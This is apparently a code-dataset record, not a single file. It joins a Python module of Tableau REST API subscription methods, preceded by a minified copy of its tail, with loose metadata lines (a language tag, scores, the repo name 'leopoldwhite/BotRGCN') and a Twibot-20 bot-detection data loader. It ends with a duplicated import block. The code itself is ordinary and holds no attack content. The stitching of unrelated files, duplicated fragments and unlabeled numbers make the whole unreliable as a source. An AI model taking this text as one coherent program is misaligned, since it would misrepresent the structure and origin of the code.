self.send_delete_request(url) self.end_log_block() class SubscriptionMethods27(SubscriptionMethods): def __init__(self, rest_api_base: TableauRestApiBase27): self.rest_api_base = rest_api_base class SubscriptionMethods28(SubscriptionMethods27): def __init__(self, rest_api_base: TableauRestApiBase28): self.rest_api_base = rest_api_base class SubscriptionMethods30(SubscriptionMethods28): def __init__(self, rest_api_base: TableauRestApiBase30): 
self.rest_api_base = rest_api_base class SubscriptionMethods31(SubscriptionMethods30): def __init__(self, rest_api_base: TableauRestApiBase31): self.rest_api_base = rest_api_base class SubscriptionMethods32(SubscriptionMethods31): def __init__(self, rest_api_base: TableauRestApiBase32): self.rest_api_base = rest_api_base class SubscriptionMethods33(SubscriptionMethods32): def __init__(self, rest_api_base: TableauRestApiBase33): self.rest_api_base = rest_api_base class SubscriptionMethods34(SubscriptionMethods33): def __init__(self, rest_api_base: TableauRestApiBase34): self.rest_api_base = rest_api_base class SubscriptionMethods35(SubscriptionMethods34): def __init__(self, rest_api_base: TableauRestApiBase35): self.rest_api_base = rest_api_base def create_subscription(self, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, username_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None, image_attachment: bool = True, pdf_attachment: bool = False, direct_xml_request: Optional[ET.Element] = None) -> str: self.start_log_block() if direct_xml_request is not None: tsr = direct_xml_request else: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") user_luid = self.query_user_luid(username_or_luid) schedule_luid = self.query_schedule_luid(schedule_name_or_luid) if self.is_luid(content_name_or_luid): content_luid = content_name_or_luid else: if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid, username_or_luid=user_luid) elif view_or_workbook == 'Workbook': content_luid = 
self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid) else: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") tsr = ET.Element('tsRequest') s = ET.Element('subscription') s.set('subject', subscription_subject) s.set('attachImage', str(image_attachment).lower()) s.set('attachPdf', str(pdf_attachment).lower()) c = ET.Element('content') c.set('type', view_or_workbook) c.set('id', content_luid) sch = ET.Element('schedule') sch.set('id', schedule_luid) u = ET.Element('user') u.set('id', user_luid) s.append(c) s.append(sch) s.append(u) tsr.append(s) url = self.build_api_url('subscriptions') try: new_subscription = self.send_add_request(url, tsr) new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id") self.end_log_block() return new_subscription_luid except RecoverableHTTPException as e: self.end_log_block() raise e except HTTPError as e: self.end_log_block() raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site') def update_subscription(self, subscription_luid: str, subject: Optional[str] = None, schedule_luid: Optional[str] = None, image_attachment: Optional[bool] = None, pdf_attachment: Optional[bool] = None) -> ET.Element: if subject is None and schedule_luid is None: raise InvalidOptionException("You must pass one of subject or schedule_luid, or both") tsr = ET.Element('tsRequest') s = ET.Element('subscription') if subject is not None: s.set('subject', subject) if image_attachment is not None: s.set('attachImage', str(image_attachment).lower()) if pdf_attachment is not None: s.set('attachPdf', str(pdf_attachment).lower()) if schedule_luid is not None: sch = ET.Element('schedule') sch.set('id', schedule_luid) s.append(sch) tsr.append(s) url = self.build_api_url("subscriptions/{}".format(subscription_luid)) response = self.send_update_request(url, tsr) self.end_log_block() return 
response class SubscriptionMethods36(SubscriptionMethods35): def __init__(self, rest_api_base: TableauRestApiBase36): self.rest_api_base = rest_api_base
from requests.exceptions import HTTPError

from .rest_api_base import *


class SubscriptionMethods():
    """Subscription endpoints of the Tableau REST API (base implementation).

    All helpers not defined here (logging, URL building, LUID lookups,
    HTTP verbs) are delegated to the wrapped ``rest_api_base`` object.
    """

    def __init__(self, rest_api_base: TableauRestApiBase):
        self.rest_api_base = rest_api_base

    def __getattr__(self, attr):
        # Delegate unknown attributes to the wrapped base API object.
        return getattr(self.rest_api_base, attr)

    def query_subscriptions(self, username_or_luid: Optional[str] = None,
                            schedule_name_or_luid: Optional[str] = None,
                            subscription_subject: Optional[str] = None,
                            view_or_workbook: Optional[str] = None,
                            content_name_or_luid: Optional[str] = None,
                            project_name_or_luid: Optional[str] = None,
                            wb_name_or_luid: Optional[str] = None) -> ET.Element:
        """Query subscriptions, optionally narrowed by user, schedule, subject
        or content.

        view_or_workbook must be 'View' or 'Workbook' when filtering content
        by name; wb_name_or_luid is required for a View name lookup.
        """
        self.start_log_block()
        subscriptions = self.query_resource('subscriptions')
        filters_dict = {}
        if subscription_subject is not None:
            filters_dict['subject'] = '[@subject="{}"]'.format(subscription_subject)
        if schedule_name_or_luid is not None:
            if self.is_luid(schedule_name_or_luid):
                # Fixed: the XPath predicate was missing its closing "]"
                filters_dict['sched'] = 'schedule[@id="{}"]'.format(schedule_name_or_luid)
            else:
                # Fixed: a schedule *name* matches @name (was @user), and the
                # predicate was missing its closing "]"
                filters_dict['sched'] = 'schedule[@name="{}"]'.format(schedule_name_or_luid)
        if username_or_luid is not None:
            if self.is_luid(username_or_luid):
                filters_dict['user'] = 'user[@id="{}"]'.format(username_or_luid)
            else:
                filters_dict['user'] = 'user[@name="{}"]'.format(username_or_luid)
        if view_or_workbook is not None:
            if view_or_workbook not in ['View', 'Workbook']:
                raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'")
            # Does this search make sense by itself?
        if content_name_or_luid is not None:
            if self.is_luid(content_name_or_luid):
                # Fixed: missing closing "]" in the XPath predicate
                filters_dict['content_luid'] = 'content[@id="{}"]'.format(content_name_or_luid)
            else:
                if view_or_workbook is None:
                    raise InvalidOptionException('view_or_workbook must be specified for content: "Workbook" or "View"')
                if view_or_workbook == 'View':
                    if wb_name_or_luid is None:
                        raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup')
                    content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid,
                                                                 proj_name_or_luid=project_name_or_luid)
                elif view_or_workbook == 'Workbook':
                    content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid)
                # Fixed: missing closing "]" in the XPath predicate
                filters_dict['content_luid'] = 'content[@id="{}"]'.format(content_luid)

        # NOTE(review): the first findall() returns a list, which has no
        # findall() of its own, so combining two or more filters raises
        # AttributeError -- confirm only single-filter use is intended.
        if 'subject' in filters_dict:
            subscriptions = subscriptions.findall('.//t:subscription{}'.format(filters_dict['subject']), self.ns_map)
        if 'user' in filters_dict:
            subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['user']), self.ns_map)
        if 'sched' in filters_dict:
            subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['sched']), self.ns_map)
        if 'content_luid' in filters_dict:
            subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['content_luid']), self.ns_map)
        self.end_log_block()
        return subscriptions

    def create_subscription(self, subscription_subject: Optional[str] = None,
                            view_or_workbook: Optional[str] = None,
                            content_name_or_luid: Optional[str] = None,
                            schedule_name_or_luid: Optional[str] = None,
                            username_or_luid: Optional[str] = None,
                            project_name_or_luid: Optional[str] = None,
                            wb_name_or_luid: Optional[str] = None,
                            direct_xml_request: Optional[ET.Element] = None) -> str:
        """Create a subscription and return the new subscription LUID.

        Either pass direct_xml_request (a prebuilt tsRequest element) or the
        individual fields; view_or_workbook must be 'View' or 'Workbook'.

        Raises InvalidOptionException when SMTP / Subscriptions are not
        enabled on the server (surfaced as an HTTPError from the REST call).
        """
        self.start_log_block()
        if direct_xml_request is not None:
            tsr = direct_xml_request
        else:
            if view_or_workbook not in ['View', 'Workbook']:
                raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'")
            user_luid = self.query_user_luid(username_or_luid)
            schedule_luid = self.query_schedule_luid(schedule_name_or_luid)
            if self.is_luid(content_name_or_luid):
                content_luid = content_name_or_luid
            else:
                if view_or_workbook == 'View':
                    if wb_name_or_luid is None:
                        raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup')
                    content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid,
                                                                 proj_name_or_luid=project_name_or_luid,
                                                                 username_or_luid=user_luid)
                elif view_or_workbook == 'Workbook':
                    content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid)
                else:
                    raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'")
            tsr = ET.Element('tsRequest')
            s = ET.Element('subscription')
            s.set('subject', subscription_subject)
            c = ET.Element('content')
            c.set('type', view_or_workbook)
            c.set('id', content_luid)
            sch = ET.Element('schedule')
            sch.set('id', schedule_luid)
            u = ET.Element('user')
            u.set('id', user_luid)
            s.append(c)
            s.append(sch)
            s.append(u)
            tsr.append(s)
        url = self.build_api_url('subscriptions')
        try:
            new_subscription = self.send_add_request(url, tsr)
            new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id")
            self.end_log_block()
            return new_subscription_luid
        except RecoverableHTTPException as e:
            self.end_log_block()
            raise e
        except HTTPError as e:
            self.end_log_block()
            raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site')

    def create_subscription_to_workbook(self, subscription_subject: str, wb_name_or_luid: str,
                                        schedule_name_or_luid: str, username_or_luid: str,
                                        project_name_or_luid: Optional[str] = None) -> str:
        """Convenience wrapper: subscribe a user to a whole workbook."""
        self.start_log_block()
        luid = self.create_subscription(subscription_subject=subscription_subject,
                                        view_or_workbook='Workbook',
                                        content_name_or_luid=wb_name_or_luid,
                                        schedule_name_or_luid=schedule_name_or_luid,
                                        username_or_luid=username_or_luid,
                                        project_name_or_luid=project_name_or_luid)
        self.end_log_block()
        return luid

    def create_subscription_to_view(self, subscription_subject: str, view_name_or_luid: str,
                                    schedule_name_or_luid: str, username_or_luid: str,
                                    wb_name_or_luid: Optional[str] = None,
                                    project_name_or_luid: Optional[str] = None) -> str:
        """Convenience wrapper: subscribe a user to a single view."""
        self.start_log_block()
        luid = self.create_subscription(subscription_subject=subscription_subject,
                                        view_or_workbook='View',
                                        content_name_or_luid=view_name_or_luid,
                                        schedule_name_or_luid=schedule_name_or_luid,
                                        username_or_luid=username_or_luid,
                                        wb_name_or_luid=wb_name_or_luid,
                                        project_name_or_luid=project_name_or_luid)
        self.end_log_block()
        return luid

    def update_subscription(self, subscription_luid: str, subject: Optional[str] = None,
                            schedule_luid: Optional[str] = None) -> ET.Element:
        """Update a subscription's subject and/or schedule; at least one of
        subject or schedule_luid must be given."""
        # Fixed: this method ended a log block it never started
        self.start_log_block()
        if subject is None and schedule_luid is None:
            raise InvalidOptionException("You must pass one of subject or schedule_luid, or both")
        tsr = ET.Element('tsRequest')
        s = ET.Element('subscription')
        if subject is not None:
            s.set('subject', subject)
        if schedule_luid is not None:
            sch = ET.Element('schedule')
            sch.set('id', schedule_luid)
            s.append(sch)
        tsr.append(s)
        url = self.build_api_url("subscriptions/{}".format(subscription_luid))
        response = self.send_update_request(url, tsr)
        self.end_log_block()
        return response

    def delete_subscriptions(self, subscription_luid_s: Union[List[str], str]):
        """Delete one subscription LUID or a list of them."""
        self.start_log_block()
        subscription_luids = self.to_list(subscription_luid_s)
        for subscription_luid in subscription_luids:
            url = self.build_api_url("subscriptions/{}".format(subscription_luid))
            self.send_delete_request(url)
        self.end_log_block()


# Per-API-version subclasses; each simply binds the matching base object
# until a version actually changes behavior (3.5 adds attachment flags).

class SubscriptionMethods27(SubscriptionMethods):
    def __init__(self, rest_api_base: TableauRestApiBase27):
        self.rest_api_base = rest_api_base

class SubscriptionMethods28(SubscriptionMethods27):
    def __init__(self, rest_api_base: TableauRestApiBase28):
        self.rest_api_base = rest_api_base

class SubscriptionMethods30(SubscriptionMethods28):
    def __init__(self, rest_api_base: TableauRestApiBase30):
        self.rest_api_base = rest_api_base

class SubscriptionMethods31(SubscriptionMethods30):
    def __init__(self, rest_api_base: TableauRestApiBase31):
        self.rest_api_base = rest_api_base

class SubscriptionMethods32(SubscriptionMethods31):
    def __init__(self, rest_api_base: TableauRestApiBase32):
        self.rest_api_base = rest_api_base

class SubscriptionMethods33(SubscriptionMethods32):
    def __init__(self, rest_api_base: TableauRestApiBase33):
        self.rest_api_base = rest_api_base

class SubscriptionMethods34(SubscriptionMethods33):
    def __init__(self, rest_api_base: TableauRestApiBase34):
        self.rest_api_base = rest_api_base

class SubscriptionMethods35(SubscriptionMethods34):
    def __init__(self, rest_api_base: TableauRestApiBase35):
        self.rest_api_base = rest_api_base

    def create_subscription(self, subscription_subject: Optional[str] = None,
                            view_or_workbook: Optional[str] = None,
                            content_name_or_luid: Optional[str] = None,
                            schedule_name_or_luid: Optional[str] = None,
                            username_or_luid: Optional[str] = None,
                            project_name_or_luid: Optional[str] = None,
                            wb_name_or_luid: Optional[str] = None,
                            image_attachment: bool = True,
                            pdf_attachment: bool = False,
                            direct_xml_request: Optional[ET.Element] = None) -> str:
        """API 3.5+: like the base create_subscription, plus attachImage /
        attachPdf flags on the subscription element."""
        self.start_log_block()
        if direct_xml_request is not None:
            tsr = direct_xml_request
        else:
            if view_or_workbook not in ['View', 'Workbook']:
                raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'")
            user_luid = self.query_user_luid(username_or_luid)
            schedule_luid = self.query_schedule_luid(schedule_name_or_luid)
            if self.is_luid(content_name_or_luid):
                content_luid = content_name_or_luid
            else:
                if view_or_workbook == 'View':
                    if wb_name_or_luid is None:
                        raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup')
                    content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid,
                                                                 proj_name_or_luid=project_name_or_luid,
                                                                 username_or_luid=user_luid)
                elif view_or_workbook == 'Workbook':
                    content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid)
                else:
                    raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'")
            tsr = ET.Element('tsRequest')
            s = ET.Element('subscription')
            s.set('subject', subscription_subject)
            # The REST API expects lowercase "true"/"false" attribute values
            s.set('attachImage', str(image_attachment).lower())
            s.set('attachPdf', str(pdf_attachment).lower())
            c = ET.Element('content')
            c.set('type', view_or_workbook)
            c.set('id', content_luid)
            sch = ET.Element('schedule')
            sch.set('id', schedule_luid)
            u = ET.Element('user')
            u.set('id', user_luid)
            s.append(c)
            s.append(sch)
            s.append(u)
            tsr.append(s)
        url = self.build_api_url('subscriptions')
        try:
            new_subscription = self.send_add_request(url, tsr)
            new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id")
            self.end_log_block()
            return new_subscription_luid
        except RecoverableHTTPException as e:
            self.end_log_block()
            raise e
        except HTTPError as e:
            self.end_log_block()
            raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site')

    def update_subscription(self, subscription_luid: str, subject: Optional[str] = None,
                            schedule_luid: Optional[str] = None,
                            image_attachment: Optional[bool] = None,
                            pdf_attachment: Optional[bool] = None) -> ET.Element:
        """API 3.5+: update subject, schedule and/or attachment flags."""
        # Fixed: this method ended a log block it never started
        self.start_log_block()
        if subject is None and schedule_luid is None:
            raise InvalidOptionException("You must pass one of subject or schedule_luid, or both")
        tsr = ET.Element('tsRequest')
        s = ET.Element('subscription')
        if subject is not None:
            s.set('subject', subject)
        if image_attachment is not None:
            s.set('attachImage', str(image_attachment).lower())
        if pdf_attachment is not None:
            s.set('attachPdf', str(pdf_attachment).lower())
        if schedule_luid is not None:
            sch = ET.Element('schedule')
            sch.set('id', schedule_luid)
            s.append(sch)
        tsr.append(s)
        url = self.build_api_url("subscriptions/{}".format(subscription_luid))
        response = self.send_update_request(url, tsr)
        self.end_log_block()
        return response

class SubscriptionMethods36(SubscriptionMethods35):
    def __init__(self, rest_api_base: TableauRestApiBase36):
        self.rest_api_base = rest_api_base
en
0.810768
# Does this search make sense by itself?
2.306672
2
Dataset.py
leopoldwhite/BotRGCN
1
6627894
import torch
import numpy as np
import pandas as pd
import json
import os
from transformers import pipeline
from datetime import datetime as dt
from torch.utils.data import Dataset


class Twibot20(Dataset):
    """Loader/preprocessor for the Twibot-20 bot-detection dataset.

    Builds the inputs BotRGCN expects -- description embeddings, tweet
    embeddings, numerical and categorical profile features, and the
    follower/following graph -- and caches each as a tensor file under
    `root` so the expensive steps run only once.
    """

    def __init__(self, root='./Data/', device='cpu', process=True, save=True):
        self.root = root
        self.device = device
        if process:
            print('Loading train.json')
            df_train = pd.read_json('./Twibot-20/train.json')
            print('Loading test.json')
            df_test = pd.read_json('./Twibot-20/test.json')
            print('Loading support.json')
            df_support = pd.read_json('./Twibot-20/support.json')
            print('Loading dev.json')
            df_dev = pd.read_json('./Twibot-20/dev.json')
            print('Finished')
            # Keep the [ID, profile, tweet, neighbor, label] columns; the
            # support split has no label column, so one is added below.
            df_train = df_train.iloc[:, [0, 1, 2, 3, 5]]
            df_test = df_test.iloc[:, [0, 1, 2, 3, 5]]
            df_support = df_support.iloc[:, [0, 1, 2, 3]]
            df_dev = df_dev.iloc[:, [0, 1, 2, 3, 5]]
            df_support['label'] = 'None'
            # Labeled users (train/dev/test) come first so the index ranges in
            # train_val_test_mask() line up; support users are appended after.
            self.df_data_labeled = pd.concat([df_train, df_dev, df_test], ignore_index=True)
            self.df_data = pd.concat([df_train, df_dev, df_test, df_support], ignore_index=True)
        self.save = save

    def load_labels(self):
        """Return the label tensor for labeled users, cached at root/label.pt."""
        print('Loading labels...', end='   ')
        path = self.root + 'label.pt'
        if not os.path.exists(path):
            labels = torch.LongTensor(self.df_data_labeled['label']).to(self.device)
            if self.save:
                # Fixed: save to the computed path so a non-default root works
                torch.save(labels, path)
        else:
            labels = torch.load(path).to(self.device)
        print('Finished')
        return labels

    def Des_Preprocess(self):
        """Collect each user's profile description ('None' if absent) into
        a numpy array cached at root/description.npy."""
        print('Loading raw feature1...', end='   ')
        path = self.root + 'description.npy'
        if not os.path.exists(path):
            description = []
            for i in range(self.df_data.shape[0]):
                if self.df_data['profile'][i] is None or self.df_data['profile'][i]['description'] is None:
                    description.append('None')
                else:
                    description.append(self.df_data['profile'][i]['description'])
            description = np.array(description)
            if self.save:
                np.save(path, description)
        else:
            description = np.load(path, allow_pickle=True)
        print('Finished')
        return description

    def Des_embbeding(self):
        """Embed each description with distilroberta (mean over token vectors).

        The misspelled method name is kept for backward compatibility.
        """
        print('Running feature1 embedding')
        path = self.root + "des_tensor.pt"
        if not os.path.exists(path):
            description = np.load(self.root + 'description.npy', allow_pickle=True)
            print('Loading RoBerta')
            feature_extraction = pipeline('feature-extraction', model="distilroberta-base",
                                          tokenizer="distilroberta-base", device=0)
            des_vec = []
            for (j, each) in enumerate(description):
                feature = torch.Tensor(feature_extraction(each))
                # Manual running sum over token embeddings, then divide:
                # equivalent to feature[0].mean(dim=0)
                for (i, tensor) in enumerate(feature[0]):
                    if i == 0:
                        feature_tensor = tensor
                    else:
                        feature_tensor += tensor
                feature_tensor /= feature.shape[1]
                des_vec.append(feature_tensor)
                if (j % 1000 == 0):
                    print('[{:>6d}/229580]'.format(j + 1))
            des_tensor = torch.stack(des_vec, 0).to(self.device)
            if self.save:
                # Fixed: save to the computed path so a non-default root works
                torch.save(des_tensor, path)
        else:
            des_tensor = torch.load(path).to(self.device)
        print('Finished')
        return des_tensor

    def tweets_preprocess(self):
        """Collect each user's tweet list (a single '' if absent) into a
        numpy array cached at root/tweets.npy."""
        print('Loading raw feature2...', end='   ')
        path = self.root + 'tweets.npy'
        if not os.path.exists(path):
            tweets = []
            for i in range(self.df_data.shape[0]):
                one_usr_tweets = []
                if self.df_data['tweet'][i] is None:
                    one_usr_tweets.append('')
                else:
                    for each in self.df_data['tweet'][i]:
                        one_usr_tweets.append(each)
                tweets.append(one_usr_tweets)
            tweets = np.array(tweets)
            if self.save:
                np.save(path, tweets)
        else:
            tweets = np.load(path, allow_pickle=True)
        print('Finished')
        return tweets

    def tweets_embedding(self):
        """Embed up to 10 tweets per user with roberta-base and average them.

        Fixed: the freshly-computed branch previously stored the result in
        `tweet_tensor` but returned the undefined name `tweets_tensor`,
        raising NameError whenever the cache file did not yet exist.
        """
        print('Running feature2 embedding')
        path = self.root + "tweets_tensor.pt"
        if not os.path.exists(path):
            # Fixed: honor self.root instead of hard-coding ./Data/
            tweets = np.load(self.root + "tweets.npy", allow_pickle=True)
            print('Loading RoBerta')
            feature_extract = pipeline('feature-extraction', model='roberta-base', tokenizer='roberta-base',
                                       device=0, padding=True, truncation=True, max_length=500,
                                       add_special_tokens=True)
            tweets_list = []
            for i, each_person_tweets in enumerate(tweets):
                for j, each_tweet in enumerate(each_person_tweets):
                    each_tweet_tensor = torch.tensor(feature_extract(each_tweet))
                    # Mean over token embeddings for this tweet
                    for k, each_word_tensor in enumerate(each_tweet_tensor[0]):
                        if k == 0:
                            total_word_tensor = each_word_tensor
                        else:
                            total_word_tensor += each_word_tensor
                    total_word_tensor /= each_tweet_tensor.shape[1]
                    # Accumulate at most the first 10 tweets per user
                    if j == 0:
                        total_each_person_tweets = total_word_tensor
                    elif j == 10:
                        break
                    else:
                        total_each_person_tweets += total_word_tensor
                if j == 10:
                    total_each_person_tweets /= 10
                else:
                    total_each_person_tweets /= len(each_person_tweets)
                tweets_list.append(total_each_person_tweets)
                if (i % 500 == 0):
                    print('[{:>6d}/229580]'.format(i + 1))
            tweets_tensor = torch.stack(tweets_list).to(self.device)
            if self.save:
                torch.save(tweets_tensor, path)
        else:
            tweets_tensor = torch.load(path).to(self.device)
        print('Finished')
        return tweets_tensor

    def num_prop_preprocess(self):
        """Build the 6-column z-scored numeric feature matrix
        [followers, friends, favourites, statuses, screen-name length,
        account age in days], cached at root/num_prop.pt."""
        print('Processing feature3...', end='   ')
        path0 = self.root + 'num_prop.pt'
        if not os.path.exists(path0):
            path = self.root
            if not os.path.exists(path + "followers_count.pt"):
                followers_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['followers_count'] is None:
                        followers_count.append(0)
                    else:
                        followers_count.append(self.df_data['profile'][i]['followers_count'])
                followers_count = torch.tensor(np.array(followers_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(followers_count, path + "followers_count.pt")

                friends_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['friends_count'] is None:
                        friends_count.append(0)
                    else:
                        friends_count.append(self.df_data['profile'][i]['friends_count'])
                friends_count = torch.tensor(np.array(friends_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(friends_count, path + 'friends_count.pt')

                screen_name_length = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['screen_name'] is None:
                        screen_name_length.append(0)
                    else:
                        screen_name_length.append(len(self.df_data['profile'][i]['screen_name']))
                screen_name_length = torch.tensor(np.array(screen_name_length, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(screen_name_length, path + 'screen_name_length.pt')

                favourites_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['favourites_count'] is None:
                        favourites_count.append(0)
                    else:
                        favourites_count.append(self.df_data['profile'][i]['favourites_count'])
                favourites_count = torch.tensor(np.array(favourites_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(favourites_count, path + 'favourites_count.pt')

                active_days = []
                # Reference date for account age; the trailing spaces in both
                # strings are deliberate and must match the format string.
                date0 = dt.strptime('Tue Sep 1 00:00:00 +0000 2020 ', '%a %b %d %X %z %Y ')
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['created_at'] is None:
                        active_days.append(0)
                    else:
                        date = dt.strptime(self.df_data['profile'][i]['created_at'], '%a %b %d %X %z %Y ')
                        active_days.append((date0 - date).days)
                active_days = torch.tensor(np.array(active_days, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(active_days, path + 'active_days.pt')

                statuses_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['statuses_count'] is None:
                        statuses_count.append(0)
                    else:
                        statuses_count.append(int(self.df_data['profile'][i]['statuses_count']))
                statuses_count = torch.tensor(np.array(statuses_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(statuses_count, path + 'statuses_count.pt')
            else:
                active_days = torch.load(path + "active_days.pt")
                screen_name_length = torch.load(path + "screen_name_length.pt")
                favourites_count = torch.load(path + "favourites_count.pt")
                followers_count = torch.load(path + "followers_count.pt")
                friends_count = torch.load(path + "friends_count.pt")
                statuses_count = torch.load(path + "statuses_count.pt")

            # z-score each column via pandas, then rebuild tensors
            active_days = pd.Series(active_days.to('cpu').detach().numpy())
            active_days = (active_days - active_days.mean()) / active_days.std()
            active_days = torch.tensor(np.array(active_days))
            screen_name_length = pd.Series(screen_name_length.to('cpu').detach().numpy())
            screen_name_length_days = (screen_name_length - screen_name_length.mean()) / screen_name_length.std()
            screen_name_length_days = torch.tensor(np.array(screen_name_length_days))
            favourites_count = pd.Series(favourites_count.to('cpu').detach().numpy())
            favourites_count = (favourites_count - favourites_count.mean()) / favourites_count.std()
            favourites_count = torch.tensor(np.array(favourites_count))
            followers_count = pd.Series(followers_count.to('cpu').detach().numpy())
            followers_count = (followers_count - followers_count.mean()) / followers_count.std()
            followers_count = torch.tensor(np.array(followers_count))
            friends_count = pd.Series(friends_count.to('cpu').detach().numpy())
            friends_count = (friends_count - friends_count.mean()) / friends_count.std()
            friends_count = torch.tensor(np.array(friends_count))
            statuses_count = pd.Series(statuses_count.to('cpu').detach().numpy())
            statuses_count = (statuses_count - statuses_count.mean()) / statuses_count.std()
            statuses_count = torch.tensor(np.array(statuses_count))

            # 229580 = total number of users in Twibot-20 (labeled + support)
            num_prop = torch.cat((followers_count.reshape([229580, 1]),
                                  friends_count.reshape([229580, 1]),
                                  favourites_count.reshape([229580, 1]),
                                  statuses_count.reshape([229580, 1]),
                                  screen_name_length_days.reshape([229580, 1]),
                                  active_days.reshape([229580, 1])), 1).to(self.device)
            if self.save:
                # Fixed: save to the computed path so a non-default root works
                torch.save(num_prop, path0)
        else:
            num_prop = torch.load(path0).to(self.device)
        print('Finished')
        return num_prop

    def cat_prop_preprocess(self):
        """Build the 11-column boolean profile-flag matrix, cached at
        root/category_properties.pt."""
        print('Processing feature4...', end='   ')
        path = self.root + 'category_properties.pt'
        if not os.path.exists(path):
            category_properties = []
            properties = ['protected', 'geo_enabled', 'verified', 'contributors_enabled', 'is_translator',
                          'is_translation_enabled', 'profile_background_tile', 'profile_use_background_image',
                          'has_extended_profile', 'default_profile', 'default_profile_image']
            for i in range(self.df_data.shape[0]):
                prop = []
                if self.df_data['profile'][i] is None:
                    # Fixed: the inner loop previously reused `i`, clobbering
                    # the outer row index and skipping users
                    for _ in range(11):
                        prop.append(0)
                else:
                    for each in properties:
                        if self.df_data['profile'][i][each] is None:
                            prop.append(0)
                        else:
                            # NOTE(review): the raw field values appear to carry
                            # a trailing space ("True ") -- do not strip without
                            # verifying against the dataset files.
                            if self.df_data['profile'][i][each] == "True ":
                                prop.append(1)
                            else:
                                prop.append(0)
                prop = np.array(prop)
                category_properties.append(prop)
            category_properties = torch.tensor(np.array(category_properties, dtype=np.float32)).to(self.device)
            if self.save:
                torch.save(category_properties, path)
        else:
            category_properties = torch.load(path).to(self.device)
        print('Finished')
        return category_properties

    def Build_Graph(self):
        """Build the follower/following edge list.

        Edge type 0 = 'following', 1 = 'follower'; neighbors whose ID is not
        in the dataset are skipped. Cached at root/edge_index.pt and
        root/edge_type.pt.
        """
        print('Building graph', end='   ')
        path = self.root + 'edge_index.pt'
        if not os.path.exists(path):
            id2index_dict = {id: index for index, id in enumerate(self.df_data['ID'])}
            edge_index = []
            edge_type = []
            for i, relation in enumerate(self.df_data['neighbor']):
                if relation is not None:
                    for each_id in relation['following']:
                        try:
                            target_id = id2index_dict[int(each_id)]
                        except KeyError:
                            continue
                        else:
                            edge_index.append([i, target_id])
                            edge_type.append(0)
                    for each_id in relation['follower']:
                        try:
                            target_id = id2index_dict[int(each_id)]
                        except KeyError:
                            continue
                        else:
                            edge_index.append([i, target_id])
                            edge_type.append(1)
                else:
                    continue
            edge_index = torch.tensor(edge_index, dtype=torch.long).t().contiguous().to(self.device)
            edge_type = torch.tensor(edge_type, dtype=torch.long).to(self.device)
            if self.save:
                torch.save(edge_index, self.root + "edge_index.pt")
                torch.save(edge_type, self.root + "edge_type.pt")
        else:
            edge_index = torch.load(self.root + "edge_index.pt").to(self.device)
            edge_type = torch.load(self.root + "edge_type.pt").to(self.device)
        print('Finished')
        return edge_index, edge_type

    def train_val_test_mask(self):
        """Fixed index splits: 8278 train / 2365 val / 1183 test users."""
        train_idx = range(8278)
        val_idx = range(8278, 8278 + 2365)
        test_idx = range(8278 + 2365, 8278 + 2365 + 1183)
        return train_idx, val_idx, test_idx

    def dataloader(self):
        """Run the full pipeline and return every model input plus splits."""
        labels = self.load_labels()
        self.Des_Preprocess()
        des_tensor = self.Des_embbeding()
        self.tweets_preprocess()
        tweets_tensor = self.tweets_embedding()
        num_prop = self.num_prop_preprocess()
        category_prop = self.cat_prop_preprocess()
        edge_index, edge_type = self.Build_Graph()
        train_idx, val_idx, test_idx = self.train_val_test_mask()
        return des_tensor, tweets_tensor, num_prop, category_prop, edge_index, edge_type, labels, train_idx, val_idx, test_idx
import torch
import numpy as np
import pandas as pd
import json
import os
from transformers import pipeline
from datetime import datetime as dt
